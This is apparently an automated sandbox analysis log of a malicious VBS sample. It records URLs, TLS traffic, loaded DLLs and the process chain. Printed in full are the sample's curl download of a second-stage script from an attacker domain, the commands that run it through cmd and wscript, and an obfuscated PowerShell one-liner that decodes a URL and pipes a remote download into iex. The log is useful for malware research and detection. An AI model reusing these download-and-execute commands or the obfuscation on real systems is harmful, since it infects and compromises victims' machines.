            Source: curl.exe, 00000004.00000002.2172280031.000001979CB37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbs&
            Source: wscript.exe, 00000000.00000002.2239998782.000001E17E8B4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2239498112.000001E17E8B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbs3
            Source: curl.exe, 00000004.00000002.2172280031.000001979CB37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbs5
            Source: curl.exe, 00000004.00000002.2172280031.000001979CB30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbsF
            Source: curl.exe, 00000004.00000002.2172280031.000001979CB30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbsWinsta0
            Source: curl.exe, 00000004.00000002.2172280031.000001979CB30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbscurl
            Source: wscript.exe, 00000007.00000002.2284471756.0000015CCBA8A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2282477339.0000015CCBA89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/ion
            Source: wscript.exe, 0000000A.00000003.2262948648.000001E9B13B8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2267957717.000001E9B13B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2262881738.000001E9B13AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2239939221.000001E9B13BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/js
            Source: wscript.exe, wscript.exe, 00000007.00000003.2282647670.0000015CCDB65000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2281995052.0000015CCD9CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2282140588.0000015CCD8B4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.2284821071.0000015CCD8B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.2284895080.0000015CCD9D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/js/bmkvfo.txt
            Source: wscript.exe, wscript.exe, 0000000A.00000003.2262948648.000001E9B13B8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2267957717.000001E9B13B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2262881738.000001E9B13AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2239939221.000001E9B13BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2240251368.000001E9B1124000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2240009164.000001E9B1124000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2263136546.000001E9B1395000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2266845754.000001E9B1120000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/js/iethuj.txt
            Source: wscript.exe, 0000000A.00000003.2239939221.000001E9B13BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/js/iethuj.txt72
            Source: wscript.exe, 0000000A.00000003.2239939221.000001E9B13BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/js/iethuj.txt88.amsi.csv8
            Source: wscript.exe, 0000000A.00000003.2239939221.000001E9B13BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/js/iethuj.txtke
            Source: wscript.exe, 00000007.00000003.2281995052.0000015CCD9CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.2284895080.0000015CCD9D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/jsX:.
            Source: wscript.exe, wscript.exe, 0000000A.00000003.2262502439.000001E9AF382000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2262573242.000001E9AF339000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2266195441.000001E9AF33D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2266409480.000001E9AF382000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2266845754.000001E9B1120000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/list_files.php
            Source: wscript.exe, 0000000A.00000003.2262573242.000001E9AF339000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2266195441.000001E9AF33D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/list_files.php5
            Source: wscript.exe, 00000007.00000002.2284642077.0000015CCBB04000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2281970950.0000015CCBB03000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2281733327.0000015CCBAF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/list_files.phpf
            Source: wscript.exe, 0000000A.00000003.2262573242.000001E9AF339000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2266195441.000001E9AF33D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/list_files.phpk
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://play.google.com/?hl=en&tab=w8
            Source: powershell.exe, 00000011.00000002.2332748509.000001CA0052E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/?hl=en&tab=wT
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/finance?tab=we
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&tab=wi
            Source: powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=wh
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=whX
            Source: powershell.exe, 00000011.00000002.2332748509.000001CA0047B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holid
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA3FCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidX
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA3FCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidays-2
            Source: powershell.exe, 00000011.00000002.2332748509.000001CA0047B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidays-20
            Source: powershell.exe, 00000011.00000002.2332748509.000001CA010F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-2xa.gif
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA3FCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA0047B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-2xa.gifX
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/shopping?hl=en&source=og&tab=wf
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/webhp?tab=ww
            Source: powershell.exe, 00000011.00000002.2332748509.000001CA00616000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2346936701.000001CA10011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2346936701.000001CA10074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: powershell.exe, 00000011.00000002.2332748509.000001CA00616000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.comX
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?tab=w1
            Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
            Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
            Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
            Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
            Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
            Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
            Source: unknown	HTTPS traffic detected: 45.11.180.77:443 -> 192.168.2.6:49709 version: TLS 1.2
            Source: unknown	HTTPS traffic detected: 45.11.180.77:443 -> 192.168.2.6:49712 version: TLS 1.2
            Source: unknown	HTTPS traffic detected: 45.11.180.77:443 -> 192.168.2.6:49711 version: TLS 1.2

            System Summary

Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exe | COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}
Source: C:\Windows\System32\wscript.exe | COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_00007FFD344F2945
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_00007FFD344F258D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_00007FFD344F2E35
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_00007FFD344F537B
Source: 67618a47ee8c5.vbs | Initial sample: Strings found which are bigger than 50
Source: classification engine | Classification label: mal100.troj.expl.evad.winVBS@28/13@3/4
Source: C:\Windows\System32\curl.exe | File created: C:\Users\Public\67618a47ee8cd.vbs
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7100:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2988:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6536:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2268:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4852:120:WilError_03
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\bmkvfo.js
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\67618a47ee8c5.vbs"
Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\67618a47ee8c5.vbs"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\67618a47ee8cd.vbs https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbs
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl -k -o C:\Users\Public\67618a47ee8cd.vbs https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbs
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\67618a47ee8cd.vbs
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\67618a47ee8cd.vbs"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\67618a47ee8cd.vbs
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\67618a47ee8cd.vbs"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\iethuj.js
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\bmkvfo.js
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\conhost.exe conhost --headless powershell $nupqcmyikef='ur' ;new-alias printout c$($nupqcmyikef)l;$rhgdckzwb=(5296,5308,5304,5308,5303,5310,5291,5249,5315,5296,5244,5239,5309,5304,5305,5240,5242,5239,5305,5297,5305,5256,5308,5254,5302,5298,5303,5309,5308,5243,5242);$wcpdukmela=('bronx','get-cmdlet');$xpyktecohun=$rhgdckzwb;foreach($mtdgshwxfkuza in $xpyktecohun){$pqhkibc=$mtdgshwxfkuza;$iqmptoujlvgyh=$iqmptoujlvgyh+[char]($pqhkibc-5193);$tbjsczxqfh=$iqmptoujlvgyh; $wlupxmqob=$tbjsczxqfh};$yexnqzpivaugw[2]=$wlupxmqob;$xmdupkr='rl';$ocxjqszgpw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wlupxmqob)
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $nupqcmyikef='ur' ;new-alias printout c$($nupqcmyikef)l;$rhgdckzwb=(5296,5308,5304,5308,5303,5310,5291,5249,5315,5296,5244,5239,5309,5304,5305,5240,5242,5239,5305,5297,5305,5256,5308,5254,5302,5298,5303,5309,5308,5243,5242);$wcpdukmela=('bronx','get-cmdlet');$xpyktecohun=$rhgdckzwb;foreach($mtdgshwxfkuza in $xpyktecohun){$pqhkibc=$mtdgshwxfkuza;$iqmptoujlvgyh=$iqmptoujlvgyh+[char]($pqhkibc-5193);$tbjsczxqfh=$iqmptoujlvgyh; $wlupxmqob=$tbjsczxqfh};$yexnqzpivaugw[2]=$wlupxmqob;$xmdupkr='rl';$ocxjqszgpw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wlupxmqob)
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\conhost.exe conhost --headless powershell $tiznsomryjec='ur' ;new-alias printout c$($tiznsomryjec)l;$ikgytfezh=(2594,2606,2602,2606,2601,2608,2589,2547,2613,2594,2542,2537,2607,2602,2603,2538,2540,2537,2603,2595,2603,2554,2606,2552,2600,2596,2601,2607,2606,2541,2540);$erxbmnil=('bronx','get-cmdlet');$nfpekqwz=$ikgytfezh;foreach($mdovnxu in $nfpekqwz){$oycmishnj=$mdovnxu;$yozmvglx=$yozmvglx+[char]($oycmishnj-2491);$agflovwuqxrnek=$yozmvglx; $ptzlyfg=$agflovwuqxrnek};$fwlxzitsjno[2]=$ptzlyfg;$aphsdzmcr='rl';$bkgejqchs=1;.$([char](9992-9887)+'e'+'x')(printout -useb $ptzlyfg)
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $tiznsomryjec='ur' ;new-alias printout c$($tiznsomryjec)l;$ikgytfezh=(2594,2606,2602,2606,2601,2608,2589,2547,2613,2594,2542,2537,2607,2602,2603,2538,2540,2537,2603,2595,2603,2554,2606,2552,2600,2596,2601,2607,2606,2541,2540);$erxbmnil=('bronx','get-cmdlet');$nfpekqwz=$ikgytfezh;foreach($mdovnxu in $nfpekqwz){$oycmishnj=$mdovnxu;$yozmvglx=$yozmvglx+[char]($oycmishnj-2491);$agflovwuqxrnek=$yozmvglx; $ptzlyfg=$agflovwuqxrnek};$fwlxzitsjno[2]=$ptzlyfg;$aphsdzmcr='rl';$bkgejqchs=1;.$([char](9992-9887)+'e'+'x')(printout -useb $ptzlyfg)
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\67618a47ee8cd.vbs https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbs
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\67618a47ee8cd.vbs
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\67618a47ee8cd.vbs
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl -k -o C:\Users\Public\67618a47ee8cd.vbs https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbs
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\67618a47ee8cd.vbs"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\bmkvfo.js
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\67618a47ee8cd.vbs"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\iethuj.js
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $nupqcmyikef='ur' ;new-alias printout c$($nupqcmyikef)l;$rhgdckzwb=(5296,5308,5304,5308,5303,5310,5291,5249,5315,5296,5244,5239,5309,5304,5305,5240,5242,5239,5305,5297,5305,5256,5308,5254,5302,5298,5303,5309,5308,5243,5242);$wcpdukmela=('bronx','get-cmdlet');$xpyktecohun=$rhgdckzwb;foreach($mtdgshwxfkuza in $xpyktecohun){$pqhkibc=$mtdgshwxfkuza;$iqmptoujlvgyh=$iqmptoujlvgyh+[char]($pqhkibc-5193);$tbjsczxqfh=$iqmptoujlvgyh; $wlupxmqob=$tbjsczxqfh};$yexnqzpivaugw[2]=$wlupxmqob;$xmdupkr='rl';$ocxjqszgpw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wlupxmqob)
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $tiznsomryjec='ur' ;new-alias printout c$($tiznsomryjec)l;$ikgytfezh=(2594,2606,2602,2606,2601,2608,2589,2547,2613,2594,2542,2537,2607,2602,2603,2538,2540,2537,2603,2595,2603,2554,2606,2552,2600,2596,2601,2607,2606,2541,2540);$erxbmnil=('bronx','get-cmdlet');$nfpekqwz=$ikgytfezh;foreach($mdovnxu in $nfpekqwz){$oycmishnj=$mdovnxu;$yozmvglx=$yozmvglx+[char]($oycmishnj-2491);$agflovwuqxrnek=$yozmvglx; $ptzlyfg=$agflovwuqxrnek};$fwlxzitsjno[2]=$ptzlyfg;$aphsdzmcr='rl';$bkgejqchs=1;.$([char](9992-9887)+'e'+'x')(printout -useb $ptzlyfg)
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: textshaping.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: textinputframework.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\curl.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\curl.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\curl.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\curl.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\curl.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\curl.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\curl.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\curl.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\curl.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\curl.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\curl.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\curl.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\curl.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: slc.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: onecorecommonproxystub.dll
